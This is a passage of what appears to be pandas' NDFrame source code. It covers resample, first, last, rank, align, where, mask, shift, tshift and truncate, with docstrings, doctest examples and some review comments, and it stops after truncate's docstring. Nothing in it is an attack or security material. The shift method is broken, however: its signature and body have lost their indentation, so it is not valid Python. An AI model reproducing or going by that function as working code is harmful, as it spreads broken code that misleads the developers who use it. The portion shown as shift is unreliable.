    Upsample the series into 30 second bins and fill the ``NaN``
    values using the ``pad`` method.
    >>> series.resample('30S').pad()[0:5]
    2000-01-01 00:00:00    0
    2000-01-01 00:00:30    0
    2000-01-01 00:01:00    1
    2000-01-01 00:01:30    1
    2000-01-01 00:02:00    2
    Freq: 30S, dtype: int64
    Upsample the series into 30 second bins and fill the
    ``NaN`` values using the ``bfill`` method.
    >>> series.resample('30S').bfill()[0:5]
    2000-01-01 00:00:00    0
    2000-01-01 00:00:30    1
    2000-01-01 00:01:00    1
    2000-01-01 00:01:30    2
    2000-01-01 00:02:00    2
    Freq: 30S, dtype: int64
    Pass a custom function via ``apply``
    >>> def custom_resampler(array_like):
    ...     return np.sum(array_like) + 5
    ...
    >>> series.resample('3T').apply(custom_resampler)
    2000-01-01 00:00:00     8
    2000-01-01 00:03:00    17
    2000-01-01 00:06:00    26
    Freq: 3T, dtype: int64
    For a Series with a PeriodIndex, the keyword `convention` can be
    used to control whether to use the start or end of `rule`.
    Resample a year by quarter using 'start' `convention`. Values are
    assigned to the first quarter of the period.
    >>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
    ...                                             freq='A',
    ...                                             periods=2))
    >>> s
    2012    1
    2013    2
    Freq: A-DEC, dtype: int64
    >>> s.resample('Q', convention='start').asfreq()
    2012Q1    1.0
    2012Q2    NaN
    2012Q3    NaN
    2012Q4    NaN
    2013Q1    2.0
    2013Q2    NaN
    2013Q3    NaN
    2013Q4    NaN
    Freq: Q-DEC, dtype: float64
    Resample quarters by month using 'end' `convention`. Values are
    assigned to the last month of the period.
    >>> q = pd.Series([1, 2, 3, 4], index=pd.period_range('2018-01-01',
    ...                                                   freq='Q',
    ...                                                   periods=4))
    >>> q
    2018Q1    1
    2018Q2    2
    2018Q3    3
    2018Q4    4
    Freq: Q-DEC, dtype: int64
    >>> q.resample('M', convention='end').asfreq()
    2018-03    1.0
    2018-04    NaN
    2018-05    NaN
    2018-06    2.0
    2018-07    NaN
    2018-08    NaN
    2018-09    3.0
    2018-10    NaN
    2018-11    NaN
    2018-12    4.0
    Freq: M, dtype: float64
    For DataFrame objects, the keyword `on` can be used to specify the
    column instead of the index for resampling.
    >>> d = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
    ...           'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
    >>> df = pd.DataFrame(d)
    >>> df['week_starting'] = pd.date_range('01/01/2018',
    ...                                     periods=8,
    ...                                     freq='W')
    >>> df
       price  volume week_starting
    0     10      50    2018-01-07
    1     11      60    2018-01-14
    2      9      40    2018-01-21
    3     13     100    2018-01-28
    4     14      50    2018-02-04
    5     18     100    2018-02-11
    6     17      40    2018-02-18
    7     19      50    2018-02-25
    >>> df.resample('M', on='week_starting').mean()
                   price  volume
    week_starting
    2018-01-31     10.75    62.5
    2018-02-28     17.00    60.0
    For a DataFrame with MultiIndex, the keyword `level` can be used to
    specify on which level the resampling needs to take place.
    >>> days = pd.date_range('1/1/2000', periods=4, freq='D')
    >>> d2 = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
    ...            'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
    >>> df2 = pd.DataFrame(d2,
    ...                    index=pd.MultiIndex.from_product([days,
    ...                                                     ['morning',
    ...                                                      'afternoon']]
    ...                                                     ))
    >>> df2
                          price  volume
    2000-01-01 morning       10      50
               afternoon     11      60
    2000-01-02 morning        9      40
               afternoon     13     100
    2000-01-03 morning       14      50
               afternoon     18     100
    2000-01-04 morning       17      40
               afternoon     19      50
    >>> df2.resample('D', level=0).sum()
                price  volume
    2000-01-01     21     110
    2000-01-02     22     140
    2000-01-03     32     150
    2000-01-04     36      90
    """
    # Imported locally to avoid a circular import between this module and
    # pandas.core.resample.
    from pandas.core.resample import get_resampler

    # Normalize axis to its integer position before delegating; all real
    # work (binning, grouping) happens in the returned Resampler.
    axis = self._get_axis_number(axis)
    return get_resampler(
        self,
        freq=rule,
        label=label,
        closed=closed,
        axis=axis,
        kind=kind,
        loffset=loffset,
        convention=convention,
        base=base,
        key=on,
        level=level,
    )
def first(self: FrameOrSeries, offset) -> FrameOrSeries:
    """
    Method to subset initial periods of time series data based on a date offset.
    Parameters
    ----------
    offset : str, DateOffset, dateutil.relativedelta
    Returns
    -------
    subset : same type as caller
    Raises
    ------
    TypeError
        If the index is not a :class:`DatetimeIndex`
    See Also
    --------
    last : Select final periods of time series based on a date offset.
    at_time : Select values at a particular time of the day.
    between_time : Select values between particular times of the day.
    Examples
    --------
    >>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
    >>> ts = pd.DataFrame({'A': [1,2,3,4]}, index=i)
    >>> ts
                A
    2018-04-09  1
    2018-04-11  2
    2018-04-13  3
    2018-04-15  4
    Get the rows for the first 3 days:
    >>> ts.first('3D')
                A
    2018-04-09  1
    2018-04-11  2
    Notice the data for 3 first calendar days were returned, not the first
    3 days observed in the dataset, and therefore data for 2018-04-13 was
    not returned.
    """
    # Offset-based subsetting only makes sense on a datetime index.
    if not isinstance(self.index, DatetimeIndex):
        raise TypeError("'first' only supports a DatetimeIndex index")
    # Nothing to subset on an empty axis.
    if len(self.index) == 0:
        return self
    offset = to_offset(offset)
    # ``end``/``end_date``: one offset past the first timestamp.
    end_date = end = self.index[0] + offset
    # Tick-like, e.g. 3 weeks
    if not offset.is_anchored() and hasattr(offset, "_inc"):
        if end_date in self.index:
            # Exact end timestamp exists in the index: use a positional
            # slice with side="left" so the end point itself is excluded.
            end = self.index.searchsorted(end_date, side="left")
            return self.iloc[:end]
    # Fall back to a label slice; note ``.loc`` is inclusive of ``end``
    # when that label is present.
    return self.loc[:end]
def last(self: FrameOrSeries, offset) -> FrameOrSeries:
    """
    Method to subset final periods of time series data based on a date offset.
    Parameters
    ----------
    offset : str, DateOffset, dateutil.relativedelta
    Returns
    -------
    subset : same type as caller
    Raises
    ------
    TypeError
        If the index is not a :class:`DatetimeIndex`
    See Also
    --------
    first : Select initial periods of time series based on a date offset.
    at_time : Select values at a particular time of the day.
    between_time : Select values between particular times of the day.
    Examples
    --------
    >>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
    >>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
    >>> ts
                A
    2018-04-09  1
    2018-04-11  2
    2018-04-13  3
    2018-04-15  4
    Get the rows for the last 3 days:
    >>> ts.last('3D')
                A
    2018-04-13  3
    2018-04-15  4
    Notice the data for 3 last calendar days were returned, not the last
    3 observed days in the dataset, and therefore data for 2018-04-11 was
    not returned.
    """
    # Offset-based subsetting only makes sense on a datetime index.
    if not isinstance(self.index, DatetimeIndex):
        raise TypeError("'last' only supports a DatetimeIndex index")
    # Nothing to subset on an empty axis.
    if len(self.index) == 0:
        return self
    offset = to_offset(offset)
    # First position strictly after (last timestamp - offset); everything
    # from there to the end lies within the trailing window.
    start_date = self.index[-1] - offset
    start = self.index.searchsorted(start_date, side="right")
    return self.iloc[start:]
def rank(
    self: FrameOrSeries,
    axis=0,
    method: str = "average",
    numeric_only: Optional[bool_t] = None,
    na_option: str = "keep",
    ascending: bool_t = True,
    pct: bool_t = False,
) -> FrameOrSeries:
    """
    Compute numerical data ranks (1 through n) along axis.
    By default, equal values are assigned a rank that is the average of the
    ranks of those values.
    Parameters
    ----------
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Index to direct ranking.
    method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
        How to rank the group of records that have the same value (i.e. ties):
        * average: average rank of the group
        * min: lowest rank in the group
        * max: highest rank in the group
        * first: ranks assigned in order they appear in the array
        * dense: like 'min', but rank always increases by 1 between groups.
    numeric_only : bool, optional
        For DataFrame objects, rank only numeric columns if set to True.
    na_option : {'keep', 'top', 'bottom'}, default 'keep'
        How to rank NaN values:
        * keep: assign NaN rank to NaN values
        * top: assign smallest rank to NaN values if ascending
        * bottom: assign highest rank to NaN values if ascending.
    ascending : bool, default True
        Whether or not the elements should be ranked in ascending order.
    pct : bool, default False
        Whether or not to display the returned rankings in percentile
        form.
    Returns
    -------
    same type as caller
        Return a Series or DataFrame with data ranks as values.
    See Also
    --------
    core.groupby.GroupBy.rank : Rank of values within each group.
    Examples
    --------
    >>> df = pd.DataFrame(data={'Animal': ['cat', 'penguin', 'dog',
    ...                                    'spider', 'snake'],
    ...                         'Number_legs': [4, 2, 4, 8, np.nan]})
    >>> df
        Animal  Number_legs
    0      cat          4.0
    1  penguin          2.0
    2      dog          4.0
    3   spider          8.0
    4    snake          NaN
    The following example shows how the method behaves with the above
    parameters:
    * default_rank: this is the default behaviour obtained without using
      any parameter.
    * max_rank: setting ``method = 'max'`` the records that have the
      same values are ranked using the highest rank (e.g.: since 'cat'
      and 'dog' are both in the 2nd and 3rd position, rank 3 is assigned.)
    * NA_bottom: choosing ``na_option = 'bottom'``, if there are records
      with NaN values they are placed at the bottom of the ranking.
    * pct_rank: when setting ``pct = True``, the ranking is expressed as
      percentile rank.
    >>> df['default_rank'] = df['Number_legs'].rank()
    >>> df['max_rank'] = df['Number_legs'].rank(method='max')
    >>> df['NA_bottom'] = df['Number_legs'].rank(na_option='bottom')
    >>> df['pct_rank'] = df['Number_legs'].rank(pct=True)
    >>> df
        Animal  Number_legs  default_rank  max_rank  NA_bottom  pct_rank
    0      cat          4.0           2.5       3.0        2.5     0.625
    1  penguin          2.0           1.0       1.0        1.0     0.250
    2      dog          4.0           2.5       3.0        2.5     0.625
    3   spider          8.0           4.0       4.0        4.0     1.000
    4    snake          NaN           NaN       NaN        5.0       NaN
    """
    axis = self._get_axis_number(axis)
    # Validate na_option up front so the error is raised before any work.
    if na_option not in {"keep", "top", "bottom"}:
        msg = "na_option must be one of 'keep', 'top', or 'bottom'"
        raise ValueError(msg)

    def ranker(data):
        # Rank the raw ndarray, then rebuild a pandas object with the
        # same axes and propagate metadata from self.
        ranks = algos.rank(
            data.values,
            axis=axis,
            method=method,
            ascending=ascending,
            na_option=na_option,
            pct=pct,
        )
        ranks = self._constructor(ranks, **data._construct_axes_dict())
        return ranks.__finalize__(self)

    # if numeric_only is None, and we can't get anything, we try with
    # numeric_only=True
    if numeric_only is None:
        try:
            return ranker(self)
        except TypeError:
            numeric_only = True
    if numeric_only:
        data = self._get_numeric_data()
    else:
        data = self
    return ranker(data)
_shared_docs[
"align"
] = """
Align two objects on their axes with the specified join method.
Join method is specified for each axis Index.
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None).
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level.
copy : bool, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series:
- pad / ffill: propagate last valid observation forward to next valid.
- backfill / bfill: use NEXT valid observation to fill gap.
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit.
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions.
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects.
"""
@Appender(_shared_docs["align"] % _shared_doc_kwargs)
def align(
    self,
    other,
    join="outer",
    axis=None,
    level=None,
    copy=True,
    fill_value=None,
    method=None,
    limit=None,
    fill_axis=0,
    broadcast_axis=None,
):
    # Docstring supplied by the Appender decorator from _shared_docs["align"].
    method = missing.clean_fill_method(method)
    # broadcast_axis=1 with mismatched ndim: expand the 1-dim object
    # (Series) into a DataFrame with identical columns, then align
    # frame-to-frame.
    if broadcast_axis == 1 and self.ndim != other.ndim:
        if isinstance(self, ABCSeries):
            # this means other is a DataFrame, and we need to broadcast
            # self
            cons = self._constructor_expanddim
            df = cons(
                {c: self for c in other.columns}, **other._construct_axes_dict()
            )
            return df._align_frame(
                other,
                join=join,
                axis=axis,
                level=level,
                copy=copy,
                fill_value=fill_value,
                method=method,
                limit=limit,
                fill_axis=fill_axis,
            )
        elif isinstance(other, ABCSeries):
            # this means self is a DataFrame, and we need to broadcast
            # other
            cons = other._constructor_expanddim
            df = cons(
                {c: other for c in self.columns}, **self._construct_axes_dict()
            )
            return self._align_frame(
                df,
                join=join,
                axis=axis,
                level=level,
                copy=copy,
                fill_value=fill_value,
                method=method,
                limit=limit,
                fill_axis=fill_axis,
            )
    if axis is not None:
        axis = self._get_axis_number(axis)
    # Dispatch on the type of ``other``: frame-to-frame or frame/series.
    if isinstance(other, ABCDataFrame):
        return self._align_frame(
            other,
            join=join,
            axis=axis,
            level=level,
            copy=copy,
            fill_value=fill_value,
            method=method,
            limit=limit,
            fill_axis=fill_axis,
        )
    elif isinstance(other, ABCSeries):
        return self._align_series(
            other,
            join=join,
            axis=axis,
            level=level,
            copy=copy,
            fill_value=fill_value,
            method=method,
            limit=limit,
            fill_axis=fill_axis,
        )
    else:  # pragma: no cover
        raise TypeError(f"unsupported type: {type(other)}")
def _align_frame(
    self,
    other,
    join="outer",
    axis=None,
    level=None,
    copy: bool_t = True,
    fill_value=None,
    method=None,
    limit=None,
    fill_axis=0,
):
    """
    Align self (Series or DataFrame) against ``other`` (a DataFrame).

    Returns the aligned pair ``(left, right)``; holes created by the
    joins are optionally filled via ``fill_value``/``method``.
    """
    # defaults
    join_index, join_columns = None, None
    ilidx, iridx = None, None
    clidx, cridx = None, None
    is_series = isinstance(self, ABCSeries)
    # Join row labels unless they already match (axis=None means both axes).
    if axis is None or axis == 0:
        if not self.index.equals(other.index):
            join_index, ilidx, iridx = self.index.join(
                other.index, how=join, level=level, return_indexers=True
            )
    # Join column labels (only meaningful when self is a DataFrame).
    if axis is None or axis == 1:
        if not is_series and not self.columns.equals(other.columns):
            join_columns, clidx, cridx = self.columns.join(
                other.columns, how=join, level=level, return_indexers=True
            )
    if is_series:
        reindexers = {0: [join_index, ilidx]}
    else:
        reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
    left = self._reindex_with_indexers(
        reindexers, copy=copy, fill_value=fill_value, allow_dups=True
    )
    # other must be always DataFrame
    right = other._reindex_with_indexers(
        {0: [join_index, iridx], 1: [join_columns, cridx]},
        copy=copy,
        fill_value=fill_value,
        allow_dups=True,
    )
    if method is not None:
        left = self._ensure_type(
            left.fillna(method=method, axis=fill_axis, limit=limit)
        )
        right = right.fillna(method=method, axis=fill_axis, limit=limit)
    # if DatetimeIndex have different tz, convert to UTC
    if is_datetime64tz_dtype(left.index):
        if left.index.tz != right.index.tz:
            if join_index is not None:
                # NOTE(review): join_index comes from Index.join, which
                # presumably resolves mixed timezones — confirm upstream.
                left.index = join_index
                right.index = join_index
    return left.__finalize__(self), right.__finalize__(other)
def _align_series(
    self,
    other,
    join="outer",
    axis=None,
    level=None,
    copy: bool_t = True,
    fill_value=None,
    method=None,
    limit=None,
    fill_axis=0,
):
    """
    Align self against ``other`` (a Series); returns ``(left, right)``.

    When self is a DataFrame, ``axis`` selects whether the Series is
    matched against the rows (0) or the columns (1).
    """
    is_series = isinstance(self, ABCSeries)
    # series/series compat, other must always be a Series
    if is_series:
        if axis:
            raise ValueError("cannot align series to a series other than axis 0")
        # equal
        if self.index.equals(other.index):
            join_index, lidx, ridx = None, None, None
        else:
            join_index, lidx, ridx = self.index.join(
                other.index, how=join, level=level, return_indexers=True
            )
        left = self._reindex_indexer(join_index, lidx, copy)
        right = other._reindex_indexer(join_index, ridx, copy)
    else:
        # one has > 1 ndim
        fdata = self._data
        if axis == 0:
            join_index = self.index
            lidx, ridx = None, None
            if not self.index.equals(other.index):
                join_index, lidx, ridx = self.index.join(
                    other.index, how=join, level=level, return_indexers=True
                )
            if lidx is not None:
                # NOTE(review): axis=1 here because the block manager's
                # axes appear reversed relative to the frame — confirm.
                fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
        elif axis == 1:
            join_index = self.columns
            lidx, ridx = None, None
            if not self.columns.equals(other.index):
                join_index, lidx, ridx = self.columns.join(
                    other.index, how=join, level=level, return_indexers=True
                )
            if lidx is not None:
                fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
        else:
            raise ValueError("Must specify axis=0 or 1")
        # Avoid returning a view of self's data when copy was requested.
        if copy and fdata is self._data:
            fdata = fdata.copy()
        left = self._constructor(fdata)
        if ridx is None:
            right = other
        else:
            right = other.reindex(join_index, level=level)
    # fill
    fill_na = notna(fill_value) or (method is not None)
    if fill_na:
        left = left.fillna(fill_value, method=method, limit=limit, axis=fill_axis)
        right = right.fillna(fill_value, method=method, limit=limit)
    # if DatetimeIndex have different tz, convert to UTC
    # NOTE(review): "not is_series and" is redundant in the condition below
    # ("A or (not A and B)" is "A or B") — candidate cleanup.
    if is_series or (not is_series and axis == 0):
        if is_datetime64tz_dtype(left.index):
            if left.index.tz != right.index.tz:
                if join_index is not None:
                    left.index = join_index
                    right.index = join_index
    return left.__finalize__(self), right.__finalize__(other)
def _where(
    self,
    cond,
    other=np.nan,
    inplace=False,
    axis=None,
    level=None,
    errors="raise",
    try_cast=False,
):
    """
    Equivalent to public method `where`, except that `other` is not
    applied as a function even if callable. Used in __setitem__.
    """
    inplace = validate_bool_kwarg(inplace, "inplace")
    # align the cond to same shape as myself
    cond = com.apply_if_callable(cond, self)
    if isinstance(cond, NDFrame):
        cond, _ = cond.align(self, join="right", broadcast_axis=1)
    else:
        # Array-like condition: must already match self's shape exactly.
        if not hasattr(cond, "shape"):
            cond = np.asanyarray(cond)
        if cond.shape != self.shape:
            raise ValueError("Array conditional must be same shape as self")
        cond = self._constructor(cond, **self._construct_axes_dict())
    # make sure we are boolean
    # When inplace, align-introduced NaNs become True (keep original value,
    # i.e. do not overwrite); otherwise they become False.
    fill_value = bool(inplace)
    cond = cond.fillna(fill_value)
    msg = "Boolean array expected for the condition, not {dtype}"
    if not isinstance(cond, ABCDataFrame):
        # This is a single-dimensional object.
        if not is_bool_dtype(cond):
            raise ValueError(msg.format(dtype=cond.dtype))
    elif not cond.empty:
        for dt in cond.dtypes:
            if not is_bool_dtype(dt):
                raise ValueError(msg.format(dtype=dt))
    # NOTE(review): unary ``-`` on an all-boolean pandas object acts as
    # logical NOT here (putmask wants the inverse mask) — confirm against
    # the pandas __neg__ implementation for bool dtypes.
    cond = -cond if inplace else cond
    # try to align with other
    try_quick = True
    if hasattr(other, "align"):
        # align with me
        if other.ndim <= self.ndim:
            _, other = self.align(
                other, join="left", axis=axis, level=level, fill_value=np.nan
            )
            # if we are NOT aligned, raise as we cannot where index
            if axis is None and not all(
                other._get_axis(i).equals(ax) for i, ax in enumerate(self.axes)
            ):
                raise InvalidIndexError
        # slice me out of the other
        else:
            raise NotImplementedError(
                "cannot align with a higher dimensional NDFrame"
            )
    if isinstance(other, np.ndarray):
        if other.shape != self.shape:
            if self.ndim == 1:
                # ``icond`` marks positions to keep from self.
                icond = cond.values
                # GH 2745 / GH 4192
                # treat like a scalar
                if len(other) == 1:
                    other = np.array(other[0])
                # GH 3235
                # match True cond to other
                elif len(cond[icond]) == len(other):
                    # try to not change dtype at first (if try_quick)
                    if try_quick:
                        new_other = com.values_from_object(self)
                        new_other = new_other.copy()
                        new_other[icond] = other
                        other = new_other
                else:
                    raise ValueError(
                        "Length of replacements must equal series length"
                    )
            else:
                raise ValueError(
                    "other must be the same shape as self when an ndarray"
                )
        # we are the same shape, so create an actual object for alignment
        else:
            other = self._constructor(other, **self._construct_axes_dict())
    if axis is None:
        axis = 0
    # ``align`` flag tells the block manager whether other needs aligning.
    if self.ndim == getattr(other, "ndim", 0):
        align = True
    else:
        align = self._get_axis_number(axis) == 1
    block_axis = self._get_block_manager_axis(axis)
    if inplace:
        # we may have different type blocks come out of putmask, so
        # reconstruct the block manager
        self._check_inplace_setting(other)
        new_data = self._data.putmask(
            mask=cond,
            new=other,
            align=align,
            inplace=True,
            axis=block_axis,
            transpose=self._AXIS_REVERSED,
        )
        self._update_inplace(new_data)
    else:
        new_data = self._data.where(
            other=other,
            cond=cond,
            align=align,
            errors=errors,
            try_cast=try_cast,
            axis=block_axis,
        )
        return self._constructor(new_data).__finalize__(self)
_shared_docs[
"where"
] = """
Replace values where the condition is %(cond_rev)s.
Parameters
----------
cond : bool %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
inplace : bool, default False
Whether to perform the operation in place on the data.
axis : int, default None
Alignment axis if needed.
level : int, default None
Alignment level if needed.
errors : str, {'raise', 'ignore'}, default 'raise'
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
- 'raise' : allow exceptions to be raised.
- 'ignore' : suppress exceptions. On error return original object.
try_cast : bool, default False
Try to cast the result back to the input type (if possible).
Returns
-------
Same type as caller
See Also
--------
:func:`DataFrame.%(name_other)s` : Return an object of same shape as
self.
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
dtype: float64
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
>>> s.where(s > 1, 10)
0 10
1 10
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> df
A B
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
"""
@Appender(
    _shared_docs["where"]
    % {
        **_shared_doc_kwargs,
        "cond": "True",
        "cond_rev": "False",
        "name": "where",
        "name_other": "mask",
    }
)
def where(
    self, cond, other=np.nan, inplace=False, axis=None, level=None,
    errors="raise", try_cast=False,
):
    # Resolve a callable ``other`` against self up front; the shared
    # replacement machinery lives in ``_where``.
    replacement = com.apply_if_callable(other, self)
    return self._where(
        cond, replacement, inplace, axis, level, errors=errors, try_cast=try_cast
    )
@Appender(
    _shared_docs["where"]
    % {
        **_shared_doc_kwargs,
        "cond": "False",
        "cond_rev": "True",
        "name": "mask",
        "name_other": "where",
    }
)
def mask(
    self, cond, other=np.nan, inplace=False, axis=None, level=None,
    errors="raise", try_cast=False,
):
    inplace = validate_bool_kwarg(inplace, "inplace")
    cond = com.apply_if_callable(cond, self)

    # see gh-21891: list-likes have no ``__invert__`` — coerce to ndarray
    # so ``~cond`` below is well defined.
    if not hasattr(cond, "__invert__"):
        cond = np.array(cond)

    # ``mask`` is simply ``where`` with the condition inverted.
    return self.where(
        ~cond, other=other, inplace=inplace, axis=axis, level=level,
        try_cast=try_cast, errors=errors,
    )
_shared_docs[
"shift"
] = """
Shift index by desired number of periods with an optional time `freq`.
When `freq` is not passed, shift the index without realigning the data.
If `freq` is passed (in this case, the index must be date or datetime,
or it will raise a `NotImplementedError`), the index will be
increased using the periods and the `freq`.
Parameters
----------
periods : int
Number of periods to shift. Can be positive or negative.
freq : DateOffset, tseries.offsets, timedelta, or str, optional
Offset to use from the tseries module or time rule (e.g. 'EOM').
If `freq` is specified then the index values are shifted but the
data is not realigned. That is, use `freq` if you would like to
extend the index when shifting and preserve the original data.
axis : {0 or 'index', 1 or 'columns', None}, default None
Shift direction.
fill_value : object, optional
The scalar value to use for newly introduced missing values.
the default depends on the dtype of `self`.
For numeric data, ``np.nan`` is used.
For datetime, timedelta, or period data, etc. :attr:`NaT` is used.
For extension dtypes, ``self.dtype.na_value`` is used.
.. versionchanged:: 0.24.0
Returns
-------
%(klass)s
Copy of input object, shifted.
See Also
--------
Index.shift : Shift values of Index.
DatetimeIndex.shift : Shift values of DatetimeIndex.
PeriodIndex.shift : Shift values of PeriodIndex.
tshift : Shift the time index, using the index's frequency if
available.
Examples
--------
>>> df = pd.DataFrame({'Col1': [10, 20, 15, 30, 45],
... 'Col2': [13, 23, 18, 33, 48],
... 'Col3': [17, 27, 22, 37, 52]})
>>> df.shift(periods=3)
Col1 Col2 Col3
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 10.0 13.0 17.0
4 20.0 23.0 27.0
>>> df.shift(periods=1, axis='columns')
Col1 Col2 Col3
0 NaN 10.0 13.0
1 NaN 20.0 23.0
2 NaN 15.0 18.0
3 NaN 30.0 33.0
4 NaN 45.0 48.0
>>> df.shift(periods=3, fill_value=0)
Col1 Col2 Col3
0 0 0 0
1 0 0 0
2 0 0 0
3 10 13 17
4 20 23 27
"""
@Appender(_shared_docs["shift"] % _shared_doc_kwargs)
def shift(
self: FrameOrSeries, periods=1, freq=None, axis=0, fill_value=None
) -> FrameOrSeries:
if periods == 0:
return self.copy()
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(
periods=periods, axis=block_axis, fill_value=fill_value
)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self: FrameOrSeries, periods: int = 1, axis=0) -> FrameOrSeries:
    """
    Equivalent to `shift` without copying data.

    The shifted data will not include the dropped periods and the
    shifted axis will be smaller than the original.

    Parameters
    ----------
    periods : int
        Number of periods to move, can be positive or negative.

    Returns
    -------
    shifted : same type as caller

    Notes
    -----
    While the `slice_shift` is faster than `shift`, you may pay for it
    later during alignment.
    """
    if periods == 0:
        return self

    # A positive shift drops the trailing values and re-labels the rest with
    # the later index entries; a negative shift is the mirror image.
    if periods > 0:
        value_slicer, index_slicer = slice(None, -periods), slice(periods, None)
    else:
        value_slicer, index_slicer = slice(-periods, None), slice(None, periods)

    shifted = self._slice(value_slicer, axis=axis)
    shifted_labels = self._get_axis(axis)[index_slicer]
    shifted.set_axis(shifted_labels, axis=axis, inplace=True)
    return shifted.__finalize__(self)
def tshift(
    self: FrameOrSeries, periods: int = 1, freq=None, axis=0
) -> FrameOrSeries:
    """
    Shift the time index, using the index's frequency if available.

    Parameters
    ----------
    periods : int
        Number of periods to move, can be positive or negative.
    freq : DateOffset, timedelta, or str, default None
        Increment to use from the tseries module
        or time rule expressed as a string (e.g. 'EOM').
    axis : {0 or 'index', 1 or 'columns', None}, default 0
        Corresponds to the axis that contains the Index.

    Returns
    -------
    shifted : Series/DataFrame

    Notes
    -----
    If freq is not specified then tries to use the freq or inferred_freq
    attributes of the index. If neither of those attributes exist, a
    ValueError is thrown
    """
    index = self._get_axis(axis)
    # Fall back to the frequency carried (or inferred) by the index itself.
    if freq is None:
        freq = getattr(index, "freq", None)
    if freq is None:
        freq = getattr(index, "inferred_freq", None)
    if freq is None:
        msg = "Freq was not given and was not set in the index"
        raise ValueError(msg)
    if periods == 0:
        # Nothing to shift; return self unchanged (no copy).
        return self
    if isinstance(freq, str):
        freq = to_offset(freq)
    block_axis = self._get_block_manager_axis(axis)
    if isinstance(index, PeriodIndex):
        orig_freq = to_offset(index.freq)
        if freq == orig_freq:
            # Same frequency: shift the PeriodIndex labels directly.
            new_data = self._data.copy()
            new_data.axes[block_axis] = index.shift(periods)
        elif orig_freq is not None:
            # A PeriodIndex cannot be shifted by a different frequency.
            raise ValueError(
                f"Given freq {freq.rule_code} does not match "
                f"PeriodIndex freq {orig_freq.rule_code}"
            )
    else:
        # Non-period index: delegate to Index.shift with the offset.
        new_data = self._data.copy()
        new_data.axes[block_axis] = index.shift(periods, freq)
    return self._constructor(new_data).__finalize__(self)
def truncate(
    self: FrameOrSeries, before=None, after=None, axis=None, copy: bool_t = True
) -> FrameOrSeries:
    """
    Truncate a Series or DataFrame before and after some index value.

    This is a useful shorthand for boolean indexing based on index
    values above or below certain thresholds.

    Parameters
    ----------
    before : date, str, int
        Truncate all rows before this index value.
    after : date, str, int
        Truncate all rows after this index value.
    axis : {0 or 'index', 1 or 'columns'}, optional
        Axis to truncate. Truncates the index (rows) by default.
    copy : bool, default is True,
        Return a copy of the truncated section.

    Returns
    -------
    type of caller
        The truncated Series or DataFrame.

    See Also
    --------
    DataFrame.loc : Select a subset of a DataFrame by label.
    DataFrame.iloc : Select a subset of a DataFrame by position.

    Notes
    -----
    The index must be sorted.  If the index being truncated contains only
    datetime values, `before` and `after` may be specified as strings,
    which are coerced to Timestamps; any unspecified time component is
    taken as 0 (midnight), unlike partial string slicing.

    Examples
    --------
    >>> df = pd.DataFrame({'A': ['a', 'b', 'c', 'd', 'e'],
    ...                    'B': ['f', 'g', 'h', 'i', 'j']},
    ...                   index=[1, 2, 3, 4, 5])
    >>> df.truncate(before=2, after=4)
       A  B
    2  b  g
    3  c  h
    4  d  i

    >>> df.truncate(before="A", after="A", axis="columns")
       A
    1  a
    2  b
    3  c
    4  d
    5  e
    """
